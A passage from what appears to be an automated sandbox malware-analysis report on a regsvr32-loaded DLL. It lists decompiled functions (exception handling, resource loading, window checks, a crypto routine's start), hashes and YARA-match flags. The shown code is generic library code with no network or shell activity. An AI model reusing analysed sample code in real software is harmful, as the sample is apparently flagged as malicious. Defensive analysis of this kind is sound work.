                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Empty$Window
                                                                              • String ID:
                                                                              • API String ID: 444217639-0
                                                                              • Opcode ID: fffcdccf9a7db221b81b9a25c6bfd6ba5514c83b8c0dacc13c4f9025be33310a
                                                                              • Instruction ID: 6d28b0c9dff1e3c13f3427290d17f0b4e84d9030e22149839eea404d6ebec4b0
                                                                              • Opcode Fuzzy Hash: fffcdccf9a7db221b81b9a25c6bfd6ba5514c83b8c0dacc13c4f9025be33310a
                                                                              • Instruction Fuzzy Hash: 13C1AE776086C88AD750DF65E584BAEBBA0F388BD8F408115EF594BB58DB78D984CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10042790 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 22%
                                                                              			E10042790(void* __edx, char* __rax, void* __rbx, long long __rcx, void* __rdi, void* __rsi, void* __rbp, void* __r8, void* __r9, void* __r12, void* __r13, void* __r14, void* __r15) {
				long long _v0;
				char _v1240;
				long long _v1384;
				char _v1400;
				long long _v1408;
				char _v1416;
				int _t15;
				void* _t16;
				void* _t17;
				long long _t34;
				void* _t37;
				void* _t40;
				void* _t47;
				void* _t48;

				_t48 = __r15;
				_t47 = __r14;
				_t46 = __r13;
				_t45 = __r12;
				_t43 = __r8;
				_t40 = __rbp;
				_t39 = __rsi;
				_t38 = __rdi;
				_t34 = __rcx;
				_t33 = __rbx;
				_t30 = __rax;
				if(( *0x1006f950 & 0x00000001) != 0) {
					_t21 = 0xa;
					_t15 = E1003E4F0(_t15, 0xa, __edx, __rbx, __rcx, _t37, __rdi, __rsi, __r8, __r9, __r12, __r13);
				}
				_t16 = E10042B90(_t15, _t30);
				if(_t30 != 0) {
					_t21 = 0x16;
					_t16 = E10042BA0(0x16, _t33, _t34, _t37, _t38, _t39, _t40, _t43, _t45, _t46, _t47, _t48);
				}
				if(( *0x1006f950 & 0x00000002) != 0) {
					__imp__RtlCaptureContext();
					r8d = 0x98;
					E1003A240(_t16, _t21, 0,  &_v1400, _t37, _t43);
					_v1384 = _v0;
					_v1400 = 0x40000015;
					_v1416 =  &_v1400;
					_t30 =  &_v1240;
					_v1408 =  &_v1240;
					SetUnhandledExceptionFilter(??);
					_t34 =  &_v1416;
					UnhandledExceptionFilter(??);
				}
				_t17 = E1003B6A0(3, _t30, _t33, _t38, _t39, _t43, _t45);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				 *0x100757b8 = _t34;
				return _t17;
			}

















                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x10042790
                                                                              0x1004279e
                                                                              0x100427a0
                                                                              0x100427a5
                                                                              0x100427a5
                                                                              0x100427aa
                                                                              0x100427b2
                                                                              0x100427b4
                                                                              0x100427b9
                                                                              0x100427b9
                                                                              0x100427c5
                                                                              0x100427cf
                                                                              0x100427dc
                                                                              0x100427e2
                                                                              0x100427f1
                                                                              0x100427fb
                                                                              0x10042803
                                                                              0x10042808
                                                                              0x10042810
                                                                              0x10042815
                                                                              0x1004281b
                                                                              0x10042820
                                                                              0x10042820
                                                                              0x1004282b
                                                                              0x10042830
                                                                              0x10042831
                                                                              0x10042832
                                                                              0x10042833
                                                                              0x10042834
                                                                              0x10042835
                                                                              0x10042836
                                                                              0x10042837
                                                                              0x10042838
                                                                              0x10042839
                                                                              0x1004283a
                                                                              0x1004283b
                                                                              0x1004283c
                                                                              0x1004283d
                                                                              0x1004283e
                                                                              0x1004283f
                                                                              0x10042840
                                                                              0x10042847

                                                                              APIs
                                                                              • RtlCaptureContext.KERNEL32 ref: 100427CF
                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 10042815
                                                                              • UnhandledExceptionFilter.KERNEL32 ref: 10042820
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                              • String ID:
                                                                              • API String ID: 2202868296-0
                                                                              • Opcode ID: 7021bb467baf022011c3d0ef3f307441f46f50cd6244c96cfdb7d62a106c504a
                                                                              • Instruction ID: d4d731c3c51d84d491c03074a7fb87f67d88afd791b6cd9acb31e97728e12735
                                                                              • Opcode Fuzzy Hash: 7021bb467baf022011c3d0ef3f307441f46f50cd6244c96cfdb7d62a106c504a
                                                                              • Instruction Fuzzy Hash: 08018835319E8142E762CB10F4153AE73A1FBC9309F810129A6CE467A5DF2CC544CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10009210 Relevance: 4.5, APIs: 3, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E10009210(void* __ebx, void* __ecx, signed int __edx, void* __esi, void* __rax, void* __rcx, signed int __rdx, void* __r8, void* __r9, void* __r11) {
				void* _t10;
				void* _t14;
				void* _t16;
				signed short _t18;
				void* _t19;
				void* _t22;
				void* _t40;
				void* _t43;
				void* _t50;
				void* _t52;

				_t52 = __r11;
				_t50 = __r9;
				_t48 = __r8;
				_t22 = __rax;
				_t19 = __esi;
				_t16 = __ecx;
				_t14 = __ebx;
				_t18 = __edx & 0x0000ffff;
				_t43 = __r8;
				_t40 = __rcx;
				 *((long long*)(__rcx + 0xb0)) = __rdx;
				if((__rdx & 0xffff0000) == 0 &&  *(__rcx + 0xa8) == 0) {
					 *(__rcx + 0xa8) = _t18 & 0x0000ffff;
				}
				E1000A57C(_t14, _t16, _t18, _t19, _t22, _t48, _t50, _t52);
				r8d = 5;
				FindResourceW(??, ??, ??);
				LoadResource(??, ??);
				_t10 = E10028584(_t22, _t40, _t22, _t43,  *((intOrPtr*)(_t22 + 0x18)));
				FreeResource(??);
				return _t10;
			}













                                                                              0x10009210
                                                                              0x10009210
                                                                              0x10009210
                                                                              0x10009210
                                                                              0x10009210
                                                                              0x10009210
                                                                              0x10009210
                                                                              0x10009210
                                                                              0x100285e4
                                                                              0x100285ea
                                                                              0x100285ed
                                                                              0x100285f4
                                                                              0x10028602
                                                                              0x10028602
                                                                              0x10028608
                                                                              0x1002860d
                                                                              0x1002861d
                                                                              0x10028629
                                                                              0x1002863e
                                                                              0x10028648
                                                                              0x10028658

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoad
                                                                              • String ID:
                                                                              • API String ID: 934874419-0
                                                                              • Opcode ID: 3976b8e1b23f2efea5e92b37d2bb06a83eecd1e5965f83d89773a9de3f3a6865
                                                                              • Instruction ID: c314a6aafe1fae153be5fdea28e2361ecd4d188a04326d0931920a5e29a34203
                                                                              • Opcode Fuzzy Hash: 3976b8e1b23f2efea5e92b37d2bb06a83eecd1e5965f83d89773a9de3f3a6865
                                                                              • Instruction Fuzzy Hash: C7F0C865B03B5045DA04CB637D0C3952291EB1EFF6F598235AD4947394EE38C5C68700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000BB34 Relevance: 4.5, APIs: 3, Instructions: 42windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E1000BB34(void* __ebx, void* __edx, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				void* __rbx;
				void* _t6;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t26;
				void* _t29;
				void* _t30;
				void* _t31;

				_t31 = __r11;
				_t30 = __r9;
				_t29 = __r8;
				_t26 = __rdx;
				_t16 = __rax;
				_t12 = __edx;
				_t11 = __ebx;
				_t13 = __edx;
				_t18 = __rcx;
				if(__rcx == 0) {
					E10016544();
					asm("int3");
				}
				GetParent();
				E10011808(_t11, _t12, _t16, _t16, _t26, _t29, _t30, _t31);
				_t6 = E100298B0(_t16, _t18, _t16, 0x10055258);
				if(_t6 != 0) {
					if(_t13 != 0) {
						L8:
						return _t6;
					}
					while(1) {
						GetParent();
						_t6 = E10011808(_t11, _t12, _t16, _t16, 0x10055258, _t29, _t30, _t31);
						_t18 = _t16;
						if(_t16 == 0) {
							goto L8;
						}
						if(IsIconic() != 0) {
							goto L3;
						}
					}
					goto L8;
				} else {
					L3:
					return 0;
				}
			}













                                                                              0x1000bb34
                                                                              0x1000bb34
                                                                              0x1000bb34
                                                                              0x1000bb34
                                                                              0x1000bb34
                                                                              0x1000bb34
                                                                              0x1000bb34
                                                                              0x1000bb3f
                                                                              0x1000bb41
                                                                              0x1000bb44
                                                                              0x1000bb46
                                                                              0x1000bb4b
                                                                              0x1000bb4b
                                                                              0x1000bb50
                                                                              0x1000bb59
                                                                              0x1000bb6b
                                                                              0x1000bb72
                                                                              0x1000bb7a
                                                                              0x1000bba6
                                                                              0x00000000
                                                                              0x1000bba6
                                                                              0x1000bb8c
                                                                              0x1000bb90
                                                                              0x1000bb99
                                                                              0x1000bba1
                                                                              0x1000bba4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1000bb8a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1000bb8a
                                                                              0x00000000
                                                                              0x1000bb74
                                                                              0x1000bb74
                                                                              0x00000000
                                                                              0x1000bb74

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Parent$Iconic
                                                                              • String ID:
                                                                              • API String ID: 344791563-0
                                                                              • Opcode ID: 2398ad2642a6802963ff280583fe899df218deb854c3ac1af742940c08dc20cf
                                                                              • Instruction ID: 70a81bdf8bd92caa3dcbef631449b1c43fbec57754a039f7e7a25d89f0f16ff3
                                                                              • Opcode Fuzzy Hash: 2398ad2642a6802963ff280583fe899df218deb854c3ac1af742940c08dc20cf
                                                                              • Instruction Fuzzy Hash: 61F03C35741A4282FF09DB66AC553986790EB8DBD9F154434DD1D8B32CFFA8C8858200
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000DF60 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0ea67174aaad7ba5ecb368304dad699e3d8b38fe13f1be4b24c67ee7dfc8484
                                                                              • Instruction ID: 4323eedaa66c811847499cd3ad5ebdd161492d9f19e5dd846f790aafeef172f6
                                                                              • Opcode Fuzzy Hash: b0ea67174aaad7ba5ecb368304dad699e3d8b38fe13f1be4b24c67ee7dfc8484
                                                                              • Instruction Fuzzy Hash: A7F0C23131464681F741FB21AE403BDE2A2EF48BC0F91D0339C4B82A5CDF6CC9848220
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10052DF8 Relevance: 4.5, APIs: 3, Instructions: 36threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread
                                                                              • String ID:
                                                                              • API String ID: 4232894706-0
                                                                              • Opcode ID: e93a26bba1744a8736589434877bcb8b20637cfe814ae029568efd7298a119af
                                                                              • Instruction ID: 8677599cde5bc05a3d4b750b6546b5359ad4522d05527d57b76adb32c0a97f7a
                                                                              • Opcode Fuzzy Hash: e93a26bba1744a8736589434877bcb8b20637cfe814ae029568efd7298a119af
                                                                              • Instruction Fuzzy Hash: B401817631478586EF11CF20A4917DA73A1EB4DF8DF851018DAC947625DE68C68ECB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002AC4C Relevance: 4.1, Strings: 3, Instructions: 330COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: K:$]w($n S$
                                                                              • API String ID: 0-3322466707
                                                                              • Opcode ID: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                                                              • Instruction ID: e698a885d6bb162bf0ff3cac371d937558b4210aa05752a6266eb715b4493fc4
                                                                              • Opcode Fuzzy Hash: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                                                              • Instruction Fuzzy Hash: 94F11570D047588BDBA8DFA8C88A6DDBBF0FB48304F60821DD85AAB251DB749949DF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180017C8C Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 47T]$K_j$is[
                                                                              • API String ID: 0-2699472077
                                                                              • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                                                              • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                                                              • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                                                              • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180005E7C Relevance: 4.0, Strings: 3, Instructions: 288COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: B+=$Mt$[4
                                                                              • API String ID: 0-935141491
                                                                              • Opcode ID: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                                                              • Instruction ID: bf1f234f614a92c8f0daef92778263c373ce788cc2d228a45e1a9745d38385ec
                                                                              • Opcode Fuzzy Hash: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                                                              • Instruction Fuzzy Hash: 36F1D470505B888FDBB9DF24CC897EB7BA0FB94316F10551EE84A9A290DFB49648CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000F678 Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $c7$@%?5$b3
                                                                              • API String ID: 0-1970763919
                                                                              • Opcode ID: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                                                              • Instruction ID: 7544b270a4a1d87a4c453583f66bfc56a0d33d7204b7a287ddb0882fb61d0d22
                                                                              • Opcode Fuzzy Hash: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                                                              • Instruction Fuzzy Hash: 48E158B5902748CFCB88DF68C69A59D7BF1FF59308F404029FC1A9A264D7B4D928CB49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180011904 Relevance: 4.0, Strings: 3, Instructions: 235COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #^$`]$%
                                                                              • API String ID: 0-102912427
                                                                              • Opcode ID: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                                                              • Instruction ID: 878e7741f870b7fe1bc6c0f4a33361fdae8fd10665ac772b8c524eb0937c225a
                                                                              • Opcode Fuzzy Hash: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                                                              • Instruction Fuzzy Hash: FDB1277090474D8FCF48CF68C88A6DE7BF0FB48398F165219E85AA6250D778D549CF89
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180014AA4 Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EQp$JK8[$kU
                                                                              • API String ID: 0-1401246002
                                                                              • Opcode ID: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                                                              • Instruction ID: 75ff6837d11cf9dd0609e11c9b8f3cf17f900585419d92be27056132c399e7dd
                                                                              • Opcode Fuzzy Hash: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                                                              • Instruction Fuzzy Hash: 2EB1587190474DCBCF88CF68C48A6DE7BF0FB58358F165219E94AA6260C778D584CF89
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180027E14 Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #X$d,U$d3
                                                                              • API String ID: 0-3246363944
                                                                              • Opcode ID: b19347f6a86a0bef7f71d8365dac67f13c927bf2e0e4be2ddf998f75a428a595
                                                                              • Instruction ID: e67d37b33042bdc2b75ebe9cceb0670a2214c716ea8b8408a91d9fe0cb16ea97
                                                                              • Opcode Fuzzy Hash: b19347f6a86a0bef7f71d8365dac67f13c927bf2e0e4be2ddf998f75a428a595
                                                                              • Instruction Fuzzy Hash: 84C1F9715093C8CBDBBEDF64C885BDA3BA9FB44708F10521DEA0A9E258CB745749CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001447C Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: X9T[$Y)~$Zo
                                                                              • API String ID: 0-3816472334
                                                                              • Opcode ID: 4d45b44019f37ffc6e1bc3352b37dca48114cbe71f71f11aaeec7abd6044a81e
                                                                              • Instruction ID: 74daf22561f986eaee31dd2e877d7e0390ad28e8a973cc345c4d359d4462c4de
                                                                              • Opcode Fuzzy Hash: 4d45b44019f37ffc6e1bc3352b37dca48114cbe71f71f11aaeec7abd6044a81e
                                                                              • Instruction Fuzzy Hash: A8A17CB5A02749CBCF48DF68C29A59D7BF1BF49304F408129FC1A9A360E3B5E525CB49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002CCE0 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ]u$"$:;
                                                                              • API String ID: 0-2021956800
                                                                              • Opcode ID: e5b729e8d3ca91e6ffaa64c5216b9ad0038ed08cda9d2019842c7aa3bd36f9ee
                                                                              • Instruction ID: 26b28f3a503e825e1842dbf9688ebde44fe9506c1339f803b7779101942ae612
                                                                              • Opcode Fuzzy Hash: e5b729e8d3ca91e6ffaa64c5216b9ad0038ed08cda9d2019842c7aa3bd36f9ee
                                                                              • Instruction Fuzzy Hash: A4619CB490438E8FCB48DF68C88A5CE7BB0FB48758F104A19EC26A7250D3B49664CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800154B8 Relevance: 3.8, Strings: 3, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$T3$$w4
                                                                              • API String ID: 0-2021144935
                                                                              • Opcode ID: bc7dc22fb94c9f236bd87286f30cded165edce72f2f8fa2203197d10143a9bcc
                                                                              • Instruction ID: b7ecb3d52509d16e0b7106ebb5b87557e4c245f613a26780fe6ea3dbe1bda8ab
                                                                              • Opcode Fuzzy Hash: bc7dc22fb94c9f236bd87286f30cded165edce72f2f8fa2203197d10143a9bcc
                                                                              • Instruction Fuzzy Hash: 2C31B1B452C781AFC788DF28C49981EBBE1FB88314F806A1CF8C68B354D7799815CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003C090 Relevance: 3.2, APIs: 2, Instructions: 235COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E1003C090(void* __ebx, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, long long _a16, long long _a24, long long _a32) {
				char _v24;
				signed int _v32;
				char _v36;
				char _v40;
				long long _v56;
				signed int _t105;
				signed int _t106;
				signed int _t108;
				signed int _t117;
				signed int _t128;
				void* _t134;
				signed int _t140;
				intOrPtr* _t151;
				unsigned long long _t174;
				signed int* _t178;
				intOrPtr _t186;
				signed long long _t189;
				intOrPtr* _t201;
				signed long long _t205;
				signed long long _t209;
				signed long long _t213;
				intOrPtr* _t217;
				long long _t221;
				void* _t225;
				signed long long _t231;
				unsigned long long _t233;
				void* _t234;
				signed long long _t238;

				_t226 = __r8;
				_t225 = __rbp;
				_t221 = __rsi;
				_t200 = __rdx;
				_t182 = __rcx;
				_t151 = __rax;
				_t148 = __esp;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t178 = __rcx;
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_t217 = __rdx;
				if(__rcx != 0) {
					 *((intOrPtr*)(__rcx)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 4)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 8)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0xc)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x10)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x14)) = 0xffffffff;
